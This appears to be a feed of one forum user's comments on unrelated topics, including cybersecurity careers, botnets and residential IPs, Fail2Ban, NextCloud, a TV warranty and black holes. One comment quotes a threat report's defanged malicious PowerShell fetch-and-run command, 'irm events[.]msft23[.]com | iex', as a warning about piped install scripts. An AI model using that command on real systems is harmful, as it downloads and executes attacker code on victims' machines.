sylver_dragon

Given how often it pops up in Office applications now, I just refer to it as “clippy”.

Did anyone have a bet on “Polymarket gets hacked?” Time to cash in.

Just to set the table, I’ve been working in IT for around 25 years. I’ve spent time at help desk, systems administration and cybersecurity. I’m now in a senior technical position, having managed to avoid being a people manager by dint of being a good enough technical worker and an honest conversation with my own managers telling them I do not want to be a manager. I don’t actually have a degree, but that’s a choice I would NOT recommend to anyone. Especially in today’s world with every paper mill churning them out. I also am regularly part of the interview and hiring process for cybersecurity hires at my current company and previous ones as well. Yes, my unedu-macated arse is involved in the decision of whom to hire.

My advice for anyone looking at Cybersecurity as a career path would be “it depends”.

If you want to be on the technical side of things, I’d argue for the Computer Science degree. If you can, take some of the Cyber Security classes as electives, but the main focus should be on understanding how systems and programs work. One of the reasons I’m able to avoid management duties is that I have a rather deep understanding of how IT and systems work. And I can usually figure out the new stuff pretty fast. Much of that comes from my own learning about systems and programming.

If you are more interested in the auditing and compliance side of cybersecurity, then the Cyber Security degree is likely to be more useful. The folks in compliance need to have a solid foundation in the language of compliance models and dealing with the “joys” of audits. They usually aren’t going to be the folks digging into the deep technical details, but they do need to know enough to ask the right questions when a program manager starts trying to bullshit them about why a high criticality security control is “N/A”. And they need to understand why that control is important. The folks I’ve interviewed with Cyber Sec degrees seem to have this sort of thing down.

No matter which way you go, I’d highly recommend getting some time in traditional IT. The folks we have been hiring usually have a career path kinda similar to my own: some background in IT (often a year or three at hell desk and possibly time as a sysadmin) followed by a move into cybersecurity. We do have a couple junior folks who didn’t spend time IT and they tend to have odd gaps in their knowledge which hold them back. We really want people whom we don’t have to explain to what an ARP table is and why you might want to pull one from a switch. Build some systems and get a grasp on why the sysadmins might make some of the choices they do. Walking a mile in the shoes of IT can really help you make sense of the alerts they generate.

Lastly, I’d give the MSc a miss for the time being and go get some experience. There is nothing quite like being in the trenches to really put the pieces together in your mind and understand why organizations might make the choices they make. Security is almost never job #1 and that leads to a lot of compromises. Learning to feel those out and communicate with folks who don’t want to do things “the right way” is an important skill. And it’s not one you’re going to learn from a book. That said, if you do have room during your degree to take a public speaking course, take it. Especially as a senior technical leader, I do a lot of speaking to people. I have directors and C-level folks randomly asking me questions. And I spend a lot of time in meetings and on calls with IT and business folks. While it’s very true that “Hell is other people”, you’re gonna spend a lot of time in that fire.

Once you have a few years in, that’s the time to get the MSc. Especially if you want to move onto management track. At that point, go get a higher degree in Business Administration. Unless your goal is in research or teaching, a higher degree in either CS or Cyber is basically a waste. Once you are far enough along the technical track, companies are looking at experience. Sure, the higher degree might be a differentiator if you are up against similarly skilled folks. But that becomes less of an issue the further you go. I don’t think I have been asked about my lack of a degree in an interview in the last decade. No one cares when you can talk to all the issues they are looking to hire you for.

No matter what you choose, never stop learning. This is a career where what you learned ten years ago is both completely irrelevant and also oddly relevant. Some of my earliest time at a computer was learning to program in BASIC. And while that’s not something I ever expect to do again, I still see patterns I learned from that all over the place today. So, keep learning, even after you get handed that fancy bit of paper. It’s both fun and pays dividends in this field.

This is a good reminder that the “S” in “Meta” stands for “Security”.

All of the above.

Is it that ISPs are being paid by tech-bros to assign them these IPs?

Bullet Proof Hosting is a thing. Some ISPs basically advertise to criminals about their ability to evade take down orders and unwillingness to work with law enforcement. So, some infrastructure ends up on these devices. However, the IP ranges from these services often get discovered and are added to public reputation and block lists.

Along side this, cloud providers are pretty bad about policing their networks. On my own home server, I have blocked much of the Digital Ocean IP space, as it’s home to a lot of scanners, bots and other malicious traffic.

Is it that residential devices have been hacked /contain malware that does this?

This happens, a lot. The Mirai Botnet thrived on compromised home routers. People are pretty bad at updating their devices and many SOHO routers ship with some pretty bad vulnerabilities. It’s only a matter of time until someone finds an unpatched or misconfigured router and adds it to a botnet. People also get phished or install trojans all the time, adding to botnets. Darknet Diaries just had a fantastic episode on the Bayrob malware, part of which was turning infected machines into a custom botnet.

Is it trivial for companies to assign themselves residential IPs?

Some ISPs just look the other way when they get reports of malicious activity on their network. Also, attackers can force a DHCP refresh and just get a new IP when the old one seems blocked. Getting one in the first place is often as simple as signing up for service and/or compromising someone’s home PC and using it as a relay.

Paid volunteers are doing this for AI companies?

This probably happens. Afterall, we’ve already seen a company selling an AI product which was just workers in India.

Obviously this is a problem because one can rotate / cycle through residential IPs and if I aggressively block each offender in my logs permanently, then the next person assigned this IP who may be a legitimate user will be unable to access my site.

Look into Fail2Ban. This program monitors your logs and will ban IPs automatically based on criteria you set. This can include specific HTTP requests in your web logs. The ban can be permanent or can be time limited. For example, I have a container running in a cloud provider which I use to proxy requests through my ISP’s CGNAT setup. There is an NGinx reverse proxy running there and I have fail2ban watching the access log. If certain request strings are seen, the sending IP gets dumped in a permanent jail. I also have it scanning the sshd logs and banning IPs which fail to login 3 times within a short period.

It’s far from a silver bullet, but it’s something which should be running on any web facing system. Attackers will always be rattling the door knobs. There is no reason to let them keep rattling away.

Thanks for sharing.

But, please stop using the curl command piped into a terminal pattern. Malicious actors have been abusing the fuck out of this pattern ever since the idiots at Anthropic decided that would be the official install pattern for Claude. I’ve been cleaning up infections based on people just blindly running shit like that constantly over the last couple months.

Folks, never run a random script from the internet, without being sure what you are actually about to run. If using AUR packages is considered risky. Random scripts being piped into a terminal ranks right up there with sticking your dick in a blender.

There is a reason I always say, “backslash, the one without the question mark”.

Looks like a large segment of the Lemmy user base needs to patch.

You’d expect it to happen ~5% of the time on a fair die. But, I’d be willing to bet a lot of dice aren’t actually fair and so the results get weighted.

The just stopped working was the client stopped syncing?

The client doesn’t seem to detect new photos as they are created/taken. If I manually upload an image from my photos folder, it syncs just fine. Files in other folders seem to sync just fine. But, photos and videos just never even try to sync.

NextCloud decided to stop allow private made certificates with its client in 2025 and its what made me switch.

This hasn’t been an issue for me. I pay for a domain and have a certificate issued by Let’s Encrypt. The only certificate errors I get are when I refresh the certificate every 6 months, and that’s just the client asking me if I want to trust the new certificate.

Syncthing

I had looked into this a while back, but it seemed to be more of a point to point solution and not a client-server system. I was aiming to have an authoritative server with everything and clients (both phone and desktop) able to pull the needed/request files. I also like the ability to share via a web link when needed. Am I wrong in that understanding?

I currently use NextCloud, but I have been looking to move away from it. My main use case is for syncing photos and videos to the cloud from my phone (Android) and this used to work flawlessly. But, some time in early 2025, it just stopped working. I can still manually upload files and sync still works for other folders (e.g. Documents) just fine. But, photos and videos just won’t sync automatically. Not sure if there are other options which would work better, but NextCloud on Android just seems to be broke.

So, they paid the attackers. Sure, the attackers may not sell or dump the data publicly, but you can bet your arse that they have a copy and will use it in future phishing campaigns or other scams.

Jumping over to the original report:

While the canonical command is “irm https[:]//claude[.]ai/install.ps1 | iex”, the lure replaced the destination host with “irm events[.]msft23[.]com | iex”.

Whatever artificially intelligent person at Anthopic decided that the official install method for Claude Code should be an irm piped to an iex in PowerShelll should be dragged out behind the same woodshed as Old Yeller. That is basically screaming “malicious code” at security tools. And it’s training developers that blindly running code from the internet is a-ok. It’s no wonder I’ve already seen exactly this sort of thing (with a different URL) happen in my environment. It’s like the AI companies are trying to make security worse.

GM is also required to:

• Stop selling driving data to consumer reporting agencies and brokers for five years.

Stop doing that until everyone forgets about it and we can go back to turning a blind eye.

This is a bit over-wrought. The important question this article doesn’t deal with is: what are those FTP servers hosting? If it’s anything which should be secured, that is a problem. But, if all it is, is a public file repository, then the extra complexity of SFTP or FTPS probably isn’t worth the trouble. My current company has an FTP server which is exactly this. It hosts product documentation and is meant to be public. While they probably should have moved on and just dumped all of it in an S3 bucket with public read, the FTP server is what our customers know and have used for decades. If it ain’t broke and the security isn’t a problem, it’s not really a priority.

I must have gotten one after the enshitification. I bought a HiSense TV during the pandemic and the unit I got was trouble from nearly day 1. A line of pixels went dead all the way across the screen. I tried to work with their warranty department and they asked for a picture of the problem.

Ok, easy enough. Take the picture and send. They reply, “can you take a picture with better lighting of the bezel?” Ok, no problem. Gerry better lighting, snap picture, send off. They reply, “can you get better lighting on the bezel?” Seriously? Fine, get the TV under really good lighting, take picture, send. “Can you get better lighting on the bezel?” WTF? Ok, I’ll admit I don’t have 50,000 candle power spot lights on it, but this is just obvious stalling. Each round of pictures and request for more is taking weeks.

During this time, the TV OS sees several updates and the underpowered nature of the system is starting to slow. The menus aren’t just sluggish, they are downright unusable. The home screen is now half ads. I finally decided, “fuck it” took the TV to the dump and bought something else.

Thankfully, the TV was only around $500. Not cheap, but the cost of the education in not buying crap didn’t hurt too much.

tl;dr: Fuck HiSense

AI Slop code base. Did Microsoft go open source?

Let’s ignore the pedantic issues of “there is no surface”, “there is no sun to rise” or “you’d be dead so insanely fast you probably wouldn’t notice”. Assuming you were magically teleported and held protected just above the event horizon of a black hole, it would be so bright you’d go blind almost instantly. Not because of any star coming over the horizon, but because the accretion disk would just be that bright. If you look at NASA’s pictures of M87, you aren’t actually seeing the black hole. There’s nothing there to see. Instead, what you are seeing in the pictures is the accretion disk around the black hole. As matter gets closer to the event horizon, it accelerates and all that stuff starts bumping into each other. At the energies involved, this produces electromagnetic radiation of basically every energy. There is infrared right up through x-ray, included lots and lots of visible light. And this is happening on a scale which is so mind mindbogglingly big that words really just fail to capture it. Here is an artistic representation with our solar system for scale. Pluto’s orbit would be well inside the event horizon. There is an insane amount of light and energy in that accretion disk. And thanks to the blackhole warping light around itself, you would be getting bombarded by its energy from every angle, including the disk on the opposite side of the black hole. In short, it would be really bright.

If we’re aiming more towards realism, there are many reasons no modern military fields anything which looks like a mech. Not the least of which is tall, thin objects stick out on a battlefield and becomes targets. If you want an armored vehicle with a big gun, you build it low to the ground and end up with a tank. More survivability usually boils down to two factors:

1. Lower observability
2. More armor/defense

You don’t die if you don’t get shot, and if you do get shot at you really, really want to prevent whatever hit you from penetrating in and killing the crew and/or disabling the vehicle.

Mechs, with spindly legs end up high above the ground and those legs become obvious targets given the complexity of making a leg work. You’d want to reduce the height, meaning shorter legs. Then you want to not have something as horridly complex as an actuating knee or hip. So, let’s just use a tracked drive or wheel instead. At for the top, why arms? Again, too much complexity, just a single rotating turret would be simpler and easier to shield. That head thing can be reduced to a sensor mast and we’ll just make the sensors omnidirectional to avoid the whole “make it spin” complexity. And um, we just built a tank. Sure, there is some advantage to walking vehicles, and they might make sense on a small scale or in support roles where they are much less likely to come under fire. But for a front-line armored vehicle, I’d buy tanks.

At the same time, mechs look cool.

You could try using Autopsy to look for files on the drive. Autopsy is a forensic analysis toolkit, which is normally used to extract evidence from disk images or the like. But, you can add local drives as data sources and that should let you browse the slack space of the filesystem for lost files. This video (not mine, just a good enough reference) should help you get started. It’s certainly not as simple as the photorec method, but it tends to be more comprehensive.